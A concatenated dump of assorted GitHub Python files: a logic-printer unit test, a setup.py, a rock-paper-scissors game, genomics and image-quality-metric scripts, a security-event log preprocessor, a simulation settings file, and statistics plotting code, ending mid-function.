a = a\"),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t), s)\n\n def testPrintUnicode(self):\n test_data = [\n (conj(A, B), \"A ∧ B\"),\n (disj(A, B), \"A ∨ B\"),\n (imp(A, B), \"A ⟶ B\"),\n (abs(a, P(a)), \"λa. P a\"),\n (all(a, P(a)), \"∀a. P a\"),\n (exists(a, P(a)), \"∃a. P a\"),\n (neg(A), \"¬A\"),\n (nat.plus(m, n), \"m + n\"),\n (nat.times(m, n), \"m * n\"),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t, unicode=True), s)\n\n def testPrintHighlight(self):\n \"\"\"Test highlight\"\"\"\n # 0, 1, 2, 3 = NORMAL, BOUND, VAR, TVAR\n test_data = [\n (abs(a,P(a)), [('%',0),('a',1),('. ',0),('P ',2),('a',1)]),\n (all(a,P(a)), [('!',0),('a',1),('. ',0),('P ',2),(\"a\",1)]),\n (all(a,all(b,conj(P(a),P(b)))), [('!',0),('a',1),('. !',0),('b',1),('. ',0),('P ',2),('a',1),(' & ',0),('P ',2),('b',1)]),\n (exists(a,all(b,R(a,b))), [('?',0),(\"a\",1),('. !',0),('b',1),('. ',0),('R ',2),('a b',1)]),\n (exists(a,P(a)), [('?',0),('a',1),('. ',0),('P ',2),('a',1)]),\n (disj(disj(A,B),C), [('(',0),('A',2),(' | ',0),('B',2),(') | ',0),('C',2)]),\n (imp(imp(A,B),C), [('(',0),('A',2),(' --> ',0),('B',2),(') --> ',0),('C',2)]),\n (abs(a,a), [('%',0),('a',1),('::',0),(\"'a\",3),('. ',0),('a',1)]),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t, highlight=True), s)\n\n def testPrintThmHighlight(self):\n \"\"\"Test printing of theorems with highlight.\"\"\"\n # 0, 1, 2, 3 = NORMAL, BOUND, VAR, TVAR\n A = Var('A', boolT)\n B = Var('B', boolT)\n A_to_B = Term.mk_implies(A, B)\n th = Thm([A, A_to_B], B)\n res = printer.print_thm(thy, th, highlight=True)\n self.assertEqual(res, [('A',2),(', ',0),('A',2),(' --> ',0),('B',2),(' ',0),('|-',0),(' ',0),('B',2)])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"zhouwenfan/temp","sub_path":"syntax/tests/printer_test.py","file_name":"printer_test.py","file_ext":"py","file_size_in_byte":9176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20540804158","text":"from setuptools import setup, find_packages\nimport sys, os\n\nversion = '0.1'\n\nsetup(name='gatekeeper',\n version=version,\n description=\"\",\n long_description=\"\"\" \"\"\",\n classifiers=[],\n keywords='',\n author='',\n author_email='',\n url='',\n license='',\n packages=find_packages('src'),\n package_dir = {'': 'src'},\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n \"cromlech.browser\",\n \"cromlech.webob\",\n \"dolmen.tales\",\n \"dolmen.template\",\n \"dolmen.forms.base\",\n \"dolmen.view\",\n \"dolmen.viewlet\",\n \"dolmen.message\",\n \"webob\",\n \"zope.i18nmessageid\",\n ],\n)\n","repo_name":"novareto/gatekeeper","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30460448248","text":"# Importing the random module\nimport random\n # Defining the get_user_choice function\ndef get_user_choice():\n # while loop to repeatedly prompt the user until they enter a valid choice ('rock', 'paper', or 'scissors'\n while True:\n choice = input(\"Enter your choice (rock, paper, scissors): \")\n if choice in [\"rock\", \"paper\", \"scissors\"]:\n return choice\n else:\n print(\"Invalid choice. 
Please try again.\")\n# Defining the get_computer_choice function\ndef get_computer_choice():\n choices = [\"rock\", \"paper\", \"scissors\"]\n return random.choice(choices)\n\n# Defining the determine_winner function\ndef determine_winner(user_choice, computer_choice):\n if user_choice == computer_choice:\n return \"It's a tie!\"\n elif (\n (user_choice == \"rock\" and computer_choice == \"scissors\") or\n (user_choice == \"paper\" and computer_choice == \"rock\") or\n (user_choice == \"scissors\" and computer_choice == \"paper\")\n ):\n return \"You win!\"\n else:\n return \"Computer wins!\"\n\n# Start the game with the welcome message\nprint(\"Welcome to Rock, Paper, Scissors Game!\")\n\n# Prompting the user to enter their choice\nuser_choice = get_user_choice()\n\n# Generating the computer's choice and print it\ncomputer_choice = get_computer_choice()\nprint(\"Computer chooses:\", computer_choice)\n\n# Determiinge the winner and printing the result\nresult = determine_winner(user_choice, computer_choice)\nprint(result)\n","repo_name":"topisteronyango/plp-python-code-challenge","sub_path":"challenge3-rock-paper-scissors/rcokpaperscissors.py","file_name":"rcokpaperscissors.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17370711783","text":"import numpy as np\nfrom sys import argv\nimport cs273b\n\ndata_dir = '/datadrive/project_data/'\n\ninsFreqs = []\ndelFreqs = []\nreference, ambiguous_bases = cs273b.load_bitpacked_reference(data_dir + \"Homo_sapiens_assembly19.fasta.bp\")\nfor i in range(1, 24):\n if i == 23:\n ch = 'X'\n else:\n ch = str(i)\n print('Processing ' + ch)\n referenceChr = reference[ch]\n c_len = len(referenceChr)\n\n insertionLocations = np.loadtxt(data_dir + \"indelLocations{}_ins.txt\".format(ch)).astype(int)\n deletionLocations = np.loadtxt(data_dir + \"indelLocations{}_del.txt\".format(ch)).astype(int)\n #indelLocations = np.concatenate((insertionLocations, deletionLocations)) - 1\n\n insFreq = float(len(insertionLocations)) / c_len\n delFreq = float(len(deletionLocations)) / c_len\n insFreqs.append(insFreq)\n delFreqs.append(delFreq)\n continue\n\n bucketsize = 1000000\n num_buckets = (c_len + bucketsize - 1) // bucketsize\n num_indels = [0]*num_buckets\n bucketsizes = [bucketsize]*num_buckets\n bucketsizes[-1] = c_len % bucketsize\n\n for il in indelLocations:\n num_indels[il / bucketsize] += 1\n\n freqs = [float(x)/y for x, y in zip(num_indels, bucketsizes)]\n\n print(np.array(freqs))\n\n #print(num_indels)\n #print(bucketsizes)\n\nprint(insFreqs)\nprint(delFreqs)\n","repo_name":"gakgsr/CS273b-Extension","sub_path":"all_histograms.py","file_name":"all_histograms.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8491637981","text":"#!/usr/bin/env python3\nimport warnings\nimport numpy as np\nfrom math import log10, sqrt\nfrom tensorflow.image import ssim\n\n# Check size and types\ndef assert_sizeImages(original, modified):\n original = np.asarray(original)\n modified = np.asarray(modified)\n\n assert original.shape == modified.shape, \"Supplied images have different sizes \" + \\\n\tstr(original.shape) + \" and \" + str(modified.shape)\n \n if original.dtype != modified.dtype:\n msg = \"Supplied images have different dtypes \" + \\\n str(original.dtype) + \" and \" + str(modified.dtype)\n warnings.warn(msg)\n\n if len(original.shape) == 2:\n original = 
original[:,:,np.newaxis]\n        modified = modified[:,:,np.newaxis]\n\n    return original.astype(np.float64), modified.astype(np.float64)\n\n\n# Mean Square Error\ndef metric_MSE(original, modified):\n    original, modified = assert_sizeImages(original,modified)\n    return np.mean((original.astype(np.float64) - modified.astype(np.float64)) ** 2)\n\n\n# Root Mean Square Error\ndef metric_RMSE(original, modified):\n    return sqrt(metric_MSE(original, modified))\n\n\n# Peak Signal to Noise Ratio\ndef metric_PSNR(original, modified):\n    mse = metric_MSE(original, modified)  # MSE, not RMSE: PSNR = 20*log10(MAX/sqrt(MSE))\n    if mse == 0.:\n        return np.inf\n    return 20 * log10(255.0 / sqrt(mse))\n\n\n# Structural Similarity Index Measure\ndef metric_SSIM(original, modified, L=255):\n    original, modified = assert_sizeImages(original,modified)\n    return ssim(original, modified, L).numpy()\n\n\n# Spectral Angle Mapper\ndef metric_SAM(original, modified):\n    original, modified = assert_sizeImages(original,modified)\n\n    original = original.reshape((original.shape[0]*original.shape[1],original.shape[2]))\n    modified = modified.reshape((modified.shape[0]*modified.shape[1],modified.shape[2]))\n\n    N = original.shape[1]\n    sam_angles = np.zeros(N)\n    for i in range(original.shape[1]):\n        val = np.clip(np.dot(original[:,i],modified[:,i]) / (np.linalg.norm(original[:,i])*np.linalg.norm(modified[:,i])),-1,1)\t\t\n        sam_angles[i] = np.arccos(val)\n\n    return np.mean(sam_angles)\n\n\n'''\nThis is a re-implementation of the Python code that implements the HaarPSI metric introduced in\nthe following paper:\nR. Reisenhofer, S. Bosse, G. Kutyniok and T. Wiegand.\nA Haar Wavelet-Based Perceptual Similarity Index for Image Quality Assessment. (PDF)\nSignal Processing: Image Communication, vol. 61, 33-43, 2018.\nThe original Python implementation can be found here:\nhttp://www.haarpsi.org/\nor here:\nhttps://github.com/rgcda/haarpsi\nThe original Python code computes haar gradients that are inaccurate and inefficient. This has\nbeen fixed in this code. As a result, this version is more accurate, and about 3 times faster.\nThis version of the code is also simpler to understand.\nNOTES:\n[1] Please note that as a result of using more accurate haar gradients, the similarity value\nreturned may be slightly different from the one obtained from the original code.\n[2] The original code limits the gradient computation to 3 scales only. This is the case here\ntoo. But the code generalizes to a greater number of scales too.\n[3] For a rather weak reason (viewing scale), in the original code, every input image is\ndownsampled by 2 in both dimensions. This is mimicked in this code.\n--------------------------\n24 August 2020\n(c) Radhakrishna Achanta\n--------------------------\n'''\n\n# Haar Perceptual Similarity Index\ndef metric_HaarPSI(original, modified):\n    original, modified = assert_sizeImages(original,modified)\n    \n    def subsample(mat):\n\n        mat = mat.astype(np.float64)\n        out = (mat[0:-1, 0:-1,...] + mat[1:, 1:,...] + mat[1:, 0:-1,...] 
+ mat[0:-1, 1:,...])/4\n return out[::2,::2,...]\n\n def RGB2YIQ(rgb):\n Y = 0.299 * rgb[:, :, 0] + 0.587 * rgb[:, :, 1] + 0.114 * rgb[:, :, 2]\n I = 0.596 * rgb[:, :, 0] - 0.274 * rgb[:, :, 1] - 0.322 * rgb[:, :, 2]\n Q = 0.211 * rgb[:, :, 0] - 0.523 * rgb[:, :, 1] + 0.312 * rgb[:, :, 2]\n\n return Y,I,Q\n\n def compute_haar_gradients(x,scales=3,doavg=True):\n\n grady = np.zeros((scales,)+x.shape)\n gradx = np.zeros((scales,)+x.shape)\n\n for s in range(scales):\n\n x2 = (x[:,:-1] + x[:,1:])*0.5 # average along rows\n grady[s,:-1,:-1] = x2[:-1,:] - x2[1:,:] # compute vertical gradients\n \n y2 = (x[:-1,:] + x[1:,:])*0.5 # average along columns\n gradx[s,:-1,:-1] = y2[:,:-1] - y2[:,1:] # compute horizontal gradients\n\n x[:-1,:-1] = (x2[:-1,:] + y2[:,:-1]) # average and reassign to x\n x = x*0.5\n\n return np.concatenate((grady, gradx),axis=0)\n\n def compute_avg(inp):\n\n out = np.zeros(inp.shape)\n out[:-1,:-1] = (inp[0:-1, 0:-1] + inp[1:, 1:] + inp[1:, 0:-1] + inp[0:-1, 1:])/4\n return out\n\n def compute_weights(coeff_refy, coeff_imgy):\n # Take the maxmimum between the absolute value of the gradients of reference and distorted images\n # for the coarsest level gradients\n v,h = scales-1, scales+scales-1\n wts_vert = np.maximum(np.abs(coeff_refy[v]),np.abs(coeff_imgy[v])) # coarsest vertical gradients\n wts_hori = np.maximum(np.abs(coeff_refy[h]),np.abs(coeff_imgy[h])) # coarsest horizontal gradients\n # wts_hv = (wts_hori+wts_vert)/2\n return wts_hori, wts_vert\n\n def compute_local_similarities_Y(coeff_refy, coeff_imgy):\n # Collect the absolute value of all the fine gradients for the reference image\n mag_ref_vert = np.abs(np.stack([coeff_refy[i] for i in range(scales-1)]))\n mag_ref_hori = np.abs(np.stack([coeff_refy[i+scales] for i in range(scales-1)]))\n\n # Collect the absolute value of all the fine gradents for the distorted image \n mag_img_vert = np.abs(np.stack([coeff_imgy[i] for i in range(scales-1)]))\n mag_img_hori = np.abs(np.stack([coeff_imgy[i+scales] for i in range(scales-1)]))\n\n # Compute the normalized correlation of the gradient magnitudes at the finest level\n local_sim_vert = np.sum((2 * mag_ref_vert * mag_img_vert + C)/(mag_ref_vert**2 + mag_img_vert**2 + C),axis=0)/2 # vertical\n local_sim_hori = np.sum((2 * mag_ref_hori * mag_img_hori + C)/(mag_ref_hori**2 + mag_img_hori**2 + C),axis=0)/2 # horizontal\n\n return local_sim_hori, local_sim_vert\n\n def compute_local_similarities_IQ(coeff_refi, coeff_refq, coeff_imgi, coeff_imgq):\n\n similarity_i = (2 * coeff_refi * coeff_imgi + C) / (coeff_refi**2 + coeff_imgi**2 + C)\n similarity_q = (2 * coeff_refq * coeff_imgq + C) / (coeff_refq**2 + coeff_imgq**2 + C)\n local_sim_iq = (similarity_i + similarity_q)/2\n\n return local_sim_iq\n\n\n # sigmoid function scaed by alpha\n def sigmoid(value, alpha):\n return 1.0 / (1.0 + np.exp(-alpha * value))\n\n # the inverse of the sigmoid function (i.e recovering x from sigmoid values)\n def logit(value, alpha):\n return np.log(value/(1 - value)) / alpha\n\n #----------------------------------\n # The main function.\n # Expected image shape is H,W (gray) or H,W,C (color) for the reference (original) and distorted (modified) images\n #----------------------------------\n def compute_similarity(original,modified):\n \n color_image = (3 == len(modified.shape)) # expected image shape is H,W (gray) or H,W,C (color)\n\n refy = subsample(original)\n imgy = subsample(modified)\n\n if color_image:\n refy,refi,refq = RGB2YIQ(refy.astype(np.float64))\n imgy,imgi,imgq = 
RGB2YIQ(imgy.astype(np.float64))\n\n coeff_refy = compute_haar_gradients(refy,scales,True)\n coeff_imgy = compute_haar_gradients(imgy,scales,True)\n\n wts_hori, wts_vert = compute_weights(coeff_refy, coeff_imgy)\n sim_yhori, sim_yvert = compute_local_similarities_Y(coeff_refy, coeff_imgy)\n\n weights = np.stack((wts_hori, wts_vert))\n local_similarities = np.stack((sim_yhori, sim_yvert))\n\n if color_image:\n # compute one additional term for weights and local_similarities in case of color images\n coeff_refi = np.abs(compute_avg(refi))\n coeff_refq = np.abs(compute_avg(refq))\n coeff_imgi = np.abs(compute_avg(imgi))\n coeff_imgq = np.abs(compute_avg(imgq))\n\n sim_iq = compute_local_similarities_IQ(coeff_refi, coeff_refq, coeff_imgi, coeff_imgq)\n\n weights = np.stack((wts_hori, wts_vert, (wts_hori+wts_vert)/2))\n local_similarities = np.stack((sim_yhori, sim_yvert, sim_iq))\n\n \n similarity = logit(np.sum(sigmoid(local_similarities[:], alpha) * weights[:]) / np.sum(weights[:]), alpha)**2\n\n return similarity\n\n\n if original.shape != modified.shape:\n raise ValueError(\"The shapes of the reference image and the distorted image do not match.\")\n #----------------------------------\n # Constants for the whole function\n #----------------------------------\n C = 30.0 # experimentally determined constant\n alpha = 4.2 # experimentally determined constant\n scales = 4\n\n return compute_similarity(original,modified)","repo_name":"Flare00/Safe-Eye","sub_path":"src/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":9169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24623339326","text":"import streamlit as st\r\nimport siqr\r\nimport sird\r\n\r\nst.beta_set_page_config(\r\n page_title=\"Modelos Biomatemáticos\",\r\n \tlayout=\"centered\",\r\n \tinitial_sidebar_state=\"expanded\",\r\n)\r\n\r\nmodel = st.sidebar.selectbox('Seleccionar modelo', ['SIR-D','SIQR'])\r\n\r\nif model == 'SIQR':\r\n siqr.main()\r\n\r\nif model == 'SIR-D':\r\n sird.main()","repo_name":"joaquin-silva/modelos-biomatematicos","sub_path":"modelos.py","file_name":"modelos.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70209269032","text":"import numpy as np\nimport sys\n\n# 3D laplace problem\n\nnx = 1\nny = 1\nnz = 4\n\nlocal = True\n\n# Dirichlet boundary conditions\nbc = {}\n\nif not local:\n for j in range(int(ny+1)):\n for i in range(int(nx+1)):\n # x = 0 plane\n x = i/nx\n y = j/ny\n index = int(j*(nx+1) + i)\n \n # z- plane (bottom)\n bc[index] = np.sin(x*np.pi)\n bc[index] = 1.0\n \n # z+ plane (top)\n index += int(nz*(nx+1)*(ny+1))\n bc[index] = np.sin(y*np.pi) + 2.0\n bc[index] = 2.0\n\nrank_no = (int)(sys.argv[-2])\n\nn_elements = [1,1,4]\nif local:\n n_elements = [1,1,1]\n if rank_no == 0:\n n_elements = [1,1,2]\n\n # boundary conditions\n bc = {}\n if rank_no == 0:\n bc = {dof:1.0 for dof in range(4)}\n elif rank_no == 2:\n bc = {-1-dof:2.0 for dof in range(4)}\n\nconfig = {\n \"logFormat\": \"csv\", # \"csv\" or \"json\", format of the lines in the log file, csv gives smaller files\n \"solverStructureDiagramFile\": \"solver_structure.txt\", # output file of a diagram that shows data connection between solvers\n \"FiniteElementMethod\" : {\n \"nElements\": n_elements,\n \"nRanks\": [1,1,1],\n \"inputMeshIsGlobal\": not local,\n \"physicalExtent\": [1.0, 1.0, 3.0],\n \"outputInterval\": 1.0,\n \n 
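# bc maps global dof index -> prescribed value; in the rank-local branch above, negative keys presumably count back from the last dof (opendihu convention).\n    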
\"dirichletBoundaryConditions\": bc,\n \"dirichletOutputFilename\": None, # filename for a vtp file that contains the Dirichlet boundary condition nodes and their values, set to None to disable\n \"neumannBoundaryConditions\": [],\n \"prefactor\": 1,\n \n \"solverType\": \"gmres\",\n \"preconditionerType\": \"none\",\n \"relativeTolerance\": 1e-15,\n \"absoluteTolerance\": 1e-10, # 1e-10 absolute tolerance of the residual \n \"maxIterations\": 10000,\n \"dumpFormat\": \"default\",\n \"dumpFilename\": \"\",\n \n \"OutputWriter\" : [\n {\"format\": \"Paraview\", \"outputInterval\": 1, \"filename\": \"out/laplace\", \"binary\": False, \"fixedFormat\": False, \"onlyNodalValues\":True, \"combineFiles\":True, \"fileNumbering\": \"incremental\"}, \n {\"format\": \"PythonFile\", \"filename\": \"out/laplace\", \"outputInterval\": 1, \"binary\":False, \"onlyNodalValues\":True, \"fileNumbering\": \"incremental\"}\n ]\n },\n}\n","repo_name":"maierbn/opendihu","sub_path":"examples/laplace/laplace3d/settings_dirichlet.py","file_name":"settings_dirichlet.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"14154526357","text":"import json\nimport os\nimport datetime\nimport pandas as pd\nimport numpy as np\n\nimport gzip\nimport sys\nif sys.version_info[0] < 3:\n from StringIO import StringIO\nelse:\n from io import StringIO\n\n\n\n# Helper functions\ndef extract_ip(x):\n if 'Source' in x.keys():\n ip = x['Source'][0].get('IP4', [''])[0]\n if ip is '':\n ip = x['Source'][0].get('IP6', [''])[0]\n if ip is '':\n raise ValueError('Failed to extract IP address')\n else:\n raise ValueError('Failed to access Source record while extracting IP address')\n return ip\n\n\ndef extract_time(x): #window):\n time_marked = x.get('EventTime', '')\n if time_marked is '':\n time_marked = x.get('DetectTime', '')\n if time_marked is '':\n raise ValueError('Failed to extract EventTime or DetectTime timestamp')\n\n fmt = '%Y-%m-%d'\n\n if 'T' in time_marked:\n fmt = fmt+'T'\n else:\n fmt = fmt+' '\n\n fmt = fmt+'%H:%M:%S'\n if '.' 
in time_marked:\n        fmt = fmt+'.%f'\n    fmt = fmt+'%z'\n\n    if time_marked[-1]=='Z':\n        time_marked = time_marked.rstrip('Z')+'+0000'\n\n    try:\n        timestamp = int(datetime.datetime.strptime(time_marked, fmt).timestamp())\n    except ValueError:\n        raise\n\n    #if window['min'] < 0:\n    #    window['min'] = timestamp\n    #elif timestamp < window['min']:\n    #    window['min'] = timestamp\n    #if window['max'] < timestamp:\n    #    window['max'] = timestamp\n\n    return timestamp\n\n\ndef get_series(evtsAt, length):\n    length = int(length)\n    vector = np.zeros(length, dtype=np.double)\n    np.add.at(vector, np.array(evtsAt).astype(int), 1)\n    #return pd.SparseArray(s, fill_value=0)\n    return vector\n\n\ndef get_bin_series(evtsAt, length):\n    length = int(length)\n    vector = np.zeros(length, dtype=np.double)\n    np.add.at(vector, np.array(evtsAt).astype(int), 1)\n    #return pd.SparseArray(s, fill_value=0)\n    return vector > 0\n\n#Could be done better\ndef count_blocks(lst):\n    last_val = lst[0]\n    sum_blocks = 0\n    for x in lst:\n        if x > 0 and x != last_val:\n            sum_blocks += 1\n        last_val = x\n    return sum_blocks\n\n\n#Preprocess to time series of events, no features\ndef preprocess(file_path, silent=True):\n    csv_str = \"ip,timestamp,origin,type,line\\n\" #line is a bit misleading\n\n    evt_types = {}\n    origins = {}\n\n    origins_n = -1\n    evt_types_n = -1\n\n    proc = 0\n    line_num = 0\n\n    signs={}\n    openf = open\n\n    if file_path[-3:] == '.gz':\n        import gzip\n        openf = gzip.open\n\n    with openf(file_path, 'r') as data:\n        lst = 0\n        curr = 0\n        line = data.readline()\n        while line:\n            #To build line index for full event retrieval, read event with readline()\n            curr = lst\n            lst = data.tell()\n\n            line_num = line_num + 1\n            x = json.loads(line)\n\n            try:\n                #name = str(x['Node'][0]['Name'])\n                name = str(x.get('Node', ['None']))\n                category = str(x.get('Category', ['None']))\n\n                #val = signs.get(str(x['Node']), 0)\n                #signs[str(x['Node'])] = val+1\n\n                origin = origins.get(name, origins_n+1)\n                if origin > origins_n:\n                    origins[name] = origins_n+1\n                    origins_n = origins_n+1\n\n                evt_type = evt_types.get(category, evt_types_n+1)\n                if evt_type > evt_types_n:\n                    evt_types[category] = evt_types_n+1\n                    evt_types_n = evt_types_n+1\n\n                ip = extract_ip(x)\n\n                timestamp = extract_time(x)\n\n                csv_str += f\"{ip},{timestamp},{origin},{evt_type},{curr}\\n\"#.format(ip, timestamp, origin, evt_type, curr)\n\n                proc += 1\n\n            except ValueError as err:\n                if not silent:\n                    print(err, end=', ')\n                    print('while processing line {}'.format(line_num))\n                pass\n            finally:\n                #if linenu > 1000: break\n                pass\n\n            line = data.readline()\n\n    # with open('./data/Nodes.txt', 'w') as f:\n    #     for key, val in signs.items():\n    #         print('{}:{}'.format(key,val), file=f)\n\n    res = pd.read_csv(StringIO(csv_str)) # it is faster than appending to a DataFrame :)\n\n    dt_origin = pd.CategoricalDtype(list(origins.keys()), ordered=True)\n    dt_type = pd.CategoricalDtype(list(evt_types.keys()), ordered=True)\n\n    res['origin'] = pd.Series(pd.Categorical.from_codes(codes=res['origin'].values, dtype=dt_origin))\n    res['type'] = pd.Series(pd.Categorical.from_codes(codes=res['type'].values, dtype=dt_type))\n\n    #if not silent:\n    print('Processed {} % of events'.format(100 * proc / line_num))\n\n    return res\n\ndef run_prep(file_path, prep_storage_dir):\n    # file_path = './data/yyyy-mm-dd.idea'\n    # where to store\n\n    df = preprocess(file_path)\n\n    path_str_list = os.path.split(file_path)\n    file_name, suffix = path_str_list[1].split('.')\n\n    file_path = prep_storage_dir + '/' + file_name\n    df.to_pickle(file_path + '.pcl')\n\n    return 
df\n\n\nif __name__ == '__main__':\n\n src = sys.argv[1]\n dst = sys.argv[2]\n if dst == '':\n dst = './data'\n\n working_dir = os.fsencode(src)\n\n for file in os.listdir(working_dir):\n file_name = os.fsdecode(file)\n\n if file_name.endswith(\".gz\") or file_name.endswith(\".idea\"):\n file_path = os.path.join(os.fsdecode(working_dir), file_name)\n res = run_prep(file_path, dst)\n else:\n continue\n","repo_name":"CESNET/SECT","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42778560713","text":"from typing import List, Dict, Callable\nfrom collections import Counter\nimport math\nimport matplotlib.pyplot as plt\n\ndef bucketize(point: float, bucket_size: float) -> float:\n\treturn bucket_size * math.floor(point / bucket_size)\n\ndef make_histogram(points: List[float], bucket_size: float) -> Dict[float, int]:\n\treturn Counter(bucketize(point, bucket_size) for point in points)\n\ndef plot_histogram(points: List[float], bucket_size: float, title: str = ''):\n\thistogram = make_histogram(points, bucket_size)\n\tplt.bar(list(histogram.keys()), list(histogram.values()), width = bucket_size)\n\tplt.title(title)\n\tplt.show()\n\nimport random\n\ndef normal_cdf(x: float, mu: float = 0, sigma: float = 1) -> float:\n\treturn (1 + math.erf((x - mu) / math.sqrt(2) / sigma)) / 2\n\ndef inverse_normal_cdf(p: float, mu: float = 0, sigma: float = 1,\n\t\t\t\t\t tolerance: float = 0.00001) -> float:\n\tif mu != 0 or sigma != 1:\n\t\treturn mu + sigma * inverse_normal_cdf(p, tolerance = tolerance)\n\tlow_z = -10\n\thi_z = 10\n\twhile hi_z - low_z > tolerance:\n\t\tmid_z = (low_z + hi_z) / 2\n\t\tmid_p = normal_cdf(mid_z)\n\t\tif mid_p < p:\n\t\t\tlow_z = mid_z\n\t\telse:\n\t\t\thi_z = mid_z\n\treturn mid_z\n\nrandom.seed(0)\n\nuniform = [200 * random.random() - 100 for _ in range(10000)]\nnormal = [57 * inverse_normal_cdf(random.random()) for _ in range(10000)]\n\nplot_histogram(uniform, 10, 'Равномерная гистограмма')\nplot_histogram(normal, 10, 'Гистограмма нормального распределения')\n\ndef random_normal():\n\treturn inverse_normal_cdf(random.random())\n\nxs = [random_normal() for _ in range(1000)]\nys1 = [x + random_normal() / 2 for x in xs]\nys2 = [-x + random_normal() / 2 for x in xs]\n\nplt.scatter(xs, ys1, marker = '.', color = 'black', label = 'ys1')\nplt.scatter(xs, ys2, marker = '.', color = 'gray', label = 'ys2')\nplt.xlabel('xs')\nplt.ylabel('ys')\nplt.legend(loc = 9)\nplt.title('Совсем разные совместные распределения')\nplt.show()\n\ndef de_mean(xs: List[float]) -> List[float]:\n\tx_bar = mean(xs)\n\treturn [x - x_bar for x in xs]\n\ndef variance(xs: List[float]) -> float:\n\tassert len(xs) >= 2, 'Дисперсия требует наличия не менее двух элементов'\n\tn = len(xs)\n\tdeviations = de_mean(xs)\n\tsum_of_squares = sum([d ** 2 for d in deviations])\n\treturn sum_of_squares / (n - 1)\n\ndef standard_deviation(xs: List[float]) -> float:\n\treturn math.sqrt(variance(xs))\n\ndef covariance(xs: List[float], ys: List[float]) -> float:\n\tassert len(xs) == len(ys), 'xs и ys должны иметь одинаковое число элементов'\n\tmean_xs = mean(xs)\n\tmean_ys = mean(ys)\n\tcov = sum([(x_i - mean_xs) * (y_i - mean_ys)\n\t\t\t for x_i, y_i in zip(xs, ys)]) / (len(xs) - 1)\n\treturn cov\n\ndef correlation(xs: List[float], ys: List[float]) -> float:\n\tstdev_x = standard_deviation(xs)\n\tstdev_y = standard_deviation(ys)\n\tif stdev_x > 0 and stdev_y > 0:\n\t\treturn 
covariance(xs, ys) / stdev_x / stdev_y\n\telse:\n\t\treturn 0\n\nVector = List[int]\nMatrix = List[List[float]]\n\ndef make_matrix(num_rows: int, num_cols: int,\n\t\t\t\tentry_fn: Callable[[int, int], float]) -> Matrix:\n\treturn [[entry_fn(i, j)\n\t\t\t for j in range(num_cols)]\n\t\t\t for i in range(num_rows)]\n\ndef correlation_matrix(data: Matrix) -> Matrix:\n\tdef correlation_ij(i: int, j: int) -> float:\n\t\treturn correlation(data[i], data[j])\n\treturn make_matrix(len(data), len(data), correlation_ij)\n\ndef random_row() -> List[float]:\n\trow = [0.0, 0, 0, 0]\n\trow[0] = random_normal()\n\trow[1] = -5 * row[0] + random_normal()\n\trow[2] = row[0] + row[1] + 5 * random_normal()\n\trow[3] = 6 if row[2] > -2 else 0\n\treturn row\n\nnum_points = 100\ncorr_rows = [random_row() for _ in range(num_points)]\ncorr_data = [list(col) for col in zip(*corr_rows)]\nnum_vectors = len(corr_data)\nfig, ax = plt.subplots(num_vectors, num_vectors)\n\nfor i in range(num_vectors):\n\tfor j in range(num_vectors):\n\t\tif i != j:\n\t\t\tax[i][j].scatter(corr_data[j], corr_data[i])\n\t\telse:\n\t\t\tax[i][j].annotate('Серия' + str(i), (0.5, 0.5),\n\t\t\t\t\t\t\t xycoords = 'axes fraction',\n\t\t\t\t\t\t\t ha = 'center', va = 'center')\n\t\tif i < num_vectors - 1:\n\t\t\tax[i][j].xaxis.set_visible(False)\n\t\tif j > 0: ax[i][j].yaxis.set_visible(False)\n\nax[-1][-1].set_xlim(ax[0][-1].get_xlim())\nax[0][0].set_ylim(ax[0][1].get_ylim())\nplt.show()\n\nimport datetime\n\nstock_price = {'closing_price': 102.06,\n 'date': datetime.date(2014, 8, 29),\n 'symbol': 'AAPL'}\n\nfrom collections import namedtuple\n\nStockPrice = namedtuple('StockPrice', ['symbol', 'date', 'closing_price'])\nprice = StockPrice('MSFT', datetime.date(2018, 12, 14), 106.03)\n\nassert price.symbol == 'MSFT'\nassert price.closing_price == 106.03\n\nfrom typing import NamedTuple\n\nclass StockPrice1(NamedTuple):\n\tsymbol: str\n\tdate: datetime.date\n\tclosing_price: float\n\n\tdef is_high_tech(self) -> bool:\n\t\treturn self.symbol in ['MSFT', 'GOOG', 'FB', 'AMZN', 'AAPL']\n\nprice1 = StockPrice1('MSFT', datetime.date(2018, 12, 14), 106.03)\n\nassert price1.symbol == 'MSFT'\nassert price1.closing_price == 106.03\nassert price1.is_high_tech()\n\nfrom dataclasses import dataclass\n\n@dataclass\nclass StockPrice2:\n\tsymbol: str\n\tdate: datetime.date\n\tclosing_price: float\n\n\tdef is_high_tech(self) -> bool:\n\t\treturn self.symbol in ['MSFT', 'GOOG', 'FB', 'AMZN', 'AAPL']\n\nprice2 = StockPrice2('MSFT', datetime.date(2018, 12, 14), 106.03)\n\nassert price2.symbol == 'MSFT'\nassert price2.closing_price == 106.03\nassert price2.is_high_tech()\n\nprice2.closing_price /= 2\nassert price2.closing_price == 53.015\n\nfrom dateutil.parser import parse\n\ndef parse_row(row: List[str]) -> StockPrice:\n\tsymbol, date, closing_price = row\n\treturn StockPrice(symbol = 